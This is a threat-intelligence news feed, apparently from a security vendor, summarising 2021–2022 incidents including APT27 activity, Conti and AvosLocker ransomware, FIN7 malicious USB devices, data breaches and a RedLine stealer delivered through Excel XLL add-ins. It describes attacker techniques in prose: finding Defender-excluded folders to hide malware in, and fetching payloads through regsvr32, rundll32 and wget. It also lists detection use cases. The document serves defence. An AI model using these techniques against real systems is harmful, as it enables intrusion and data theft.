German Intelligence Services warn of APT27

February 01, 2022

German Intelligence Services warn of APT27

Industry: N/A | Level: Tactical | Source: BleepingComputer

An advisory was released by the German Domestic Intelligence services, BfV observing threat activity from APT27 targeting commercial German organizations. In-memory tool, HyperBro, is observed to be utilized from the group as the remote access trojan (RAT). The threat group’s motives, shared by the intelligence agency states, “It cannot be ruled out that the actors, in addition to stealing business secrets and intellectual property, also try to infiltrate the networks of (corporate) customers or service providers (supply chain attack).” Additional intelligence from the group overlaps with reports from the security industry detailing APT27 exploiting vulnerabilities in Zoho AdSelf Service Plus and Zoho ManageEngine.

  • Anvilogic Scenario: TiltedTemple Campaign

RRD Victim of Conti Ransomware Attack

January 25, 2022

RRD victim of Conti Ransomware Attack

Industry: Communications & Marketing | Level: Strategic | Source: BleepingComputer

Communications company R.R. Donnelley & Sons (RRD) was the victim of a Conti ransomware attack in December 2021, filing disclosure with the SEC on December 27th, 2021. The compromise led to the shut down of the company’s network in order to mitigate the attack resulting in an interruption in business operations. Initially, RRD did not identify the compromise of client data, the Conti gang claimed on January 15th that 2.5 GB of data were stolen. It appears both sides are cooperating on the ransomware, given Conti removing the leaked data from public view. The issue and impact are still developing with the following statement from RRD in its SEC filing, “At this time, however, the Company has become aware that certain of its corporate data was accessed and exfiltrated, the nature of which is being actively examined. Based on information known to date, the Company believes the access and exfiltration was in connection with the previously disclosed systems intrusion and not a new incident.”

Microsoft Defender Weakness

January 18, 2022

Microsoft Defender Weakness

Industry: N/A | Level: Strategic | Source: BleepingComputer

An issue/weakness has been identified by SentinelOne researchers enabling local attackers to query the registry for Windows Defender to identify what locations are excluded by Microsoft Defender. By scanning the threat actors can take advantage to plant malware. The issue extends to Group Policy settings that could also be queried from the registry tree that extends the attacker’s visibility into the network. BleepingComputer conducted a test finding by a utilizing a Conti ransomware sample and executing it in an excluded folder Microsoft Defender took no action as opposed to verifying a block action when executing from a non-excluded location. The issue affects Windows 10 versions 21H1 and 21H2, however, is not an issue in Windows 11.

AvosLocker Targets VMware ESXi

January 05, 2022

AvosLocker Targets VMware ESXi

Industry: N/A | Level: Strategic | Source: BleepingComputer

AvosLoacker adds Linux support to its ransomware arsenal as researchers identified the latest variant targeting VMware ESXi virtual machines. One victim has been identified by Threat Researcher Chistiaan Beek – @ChristiaanBeek. The unknown entity was hit with a $1 million ransom demand. Limited technical details are released, however, what is known is the ransomware terminates VMs prior to encryption, appends extension “.avoslinux” to encrypted files, and provide a ransom note to victims. A stipulation is placed that workstations cannot be shut down to “avoid file corruption.”

FIN7 and Bad USBs

January 05, 2022

FIN7 and Bad USBs

Industry: Defense | Level: Tactical | Source: BleepingComputer

A flash alert from the Federal Bureau of Investigation (FBI) warns of targeted activity against US defense industries from FIN7 delivering malicious USB devices, spotted with logo “LilyGO” on the devices. The campaign appears to have been active since August 2021 with various impersonation attempts to lure victims. They pose as Amazon, the US Department of Health & Human Services (HHS), COVID-19 guideline details and thank you letters. The malicious USB devices contain a keylogger and setups malware payload that downloads to set up ransomware. Downloaded malware includes Metasploit, Cobalt Strike, Carbanak malware, Griffon backdoor, and PowerShell scripts.

  • Anvilogic Use Cases:
    • PowerShell Script Keylogger
    • Executable File Written to Disk
    • Executable Process from Suspicious Folder
    • Wscript/Cscript Execution

AvoLocker Ransomware Backtracks

December 29, 2021

AvoLocker Ransomware Backtracks

Industry: Government | Level: Strategic | Source: BleepingComputer

A US police department was breached by AvosLocker last month resulting in data exfiltration and encryption. However, based on a shared screenshot from security researcher pancak3 via Twitter, the ransomware gang provided the decryptor key to the affected agency after learning the victim is associated with the US government, however no information was given to what data was stolen.

Broward Health Data Breach

December 29, 2021

Broward Health Data Breach

Industry: Health | Level: Strategic | Source: BleepingComputer

Florida-based Broward Health disclosed a data breach occurring on October 15th, 2021. The breach impacted 1,357,879 individuals with the organization identifying the incident four days later, the same day the FBI and the US Department of Justice were notified. The intrusion to the hospital’s network impacted patient data, including names, birth dates, physical addresses, phone numbers, financial information, social security numbers, emails, medical information/history, and more.

McMenamins Suffers Conti Ransomware Attack

December 21, 2021

McMenamins suffers Conti Ransomware Attack

Industry: Hospitality, Food & Beverage | Level: Strategic | Source: BleepingComputer

A ransomware attack by Conti, disrupted operations for Portland brewery and hotel chain McMenamins. The attack occurred on December 12th, 2021, and impacted point-of-sale systems, servers, and workstations forcing McMenamins to shut their IT systems down. The investigation is ongoing and it is unknown at the moment if there is any impact on customer data.

Sports Gear Sites Data Breach Impacts 1.8 Million People

December 21, 2021

Sports Gear Sites data breach impacts 1.8 million people

Industry: Retail | Level: Strategic | Source: BleepingComputer

A law firm representing four affiliated online sports gear sites Tackle Warehouse LLC, Running Warehouse LLC, Tennis Warehouse LCC and Skate Warehouse LLC, has disclosed a cyberattack resulting in stolen credit card information impacting 1,813,224 customers. The breach was identified on October 15th, and confirmed on November 29th. Compromised data includes name, financial account number, credit/debit card numbers with CVV, and website account password. No details are provided on the cyberattack and notices were sent to impacted customers by the company, however no identity protection service was provided.

Microsoft Excel (XLL) Leads to RedLine Info-Stealer

December 01, 2021

Microsoft Excel (XLL) Leads to RedLine Info-Stealer

Industry: N/A | Level: Tactical | Source: BleepingComputer

Threat Actors are utilizing public discussion forums, or article comment systems, to spread malicious Excel documents that ultimately download and install RedLine information stealer. Malicious links are hosted on Google Drive and download a XLL which BleepingComputer describes as, “an an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an ‘xlAutoOpen’ function executed by Microsoft Excel when the add-in is opened.” While tests have had unsuccessful executions, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32 that extracts the wget.exe program to download the RedLine binary saving it as %UserProfile%\JavaBridge32.exe. Once downloaded an autorun registry entry will launch and enable persistence for the malware.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • regsvr32 Execution
    • Rundll32 Command Line
    • Invoke-WebRequest Command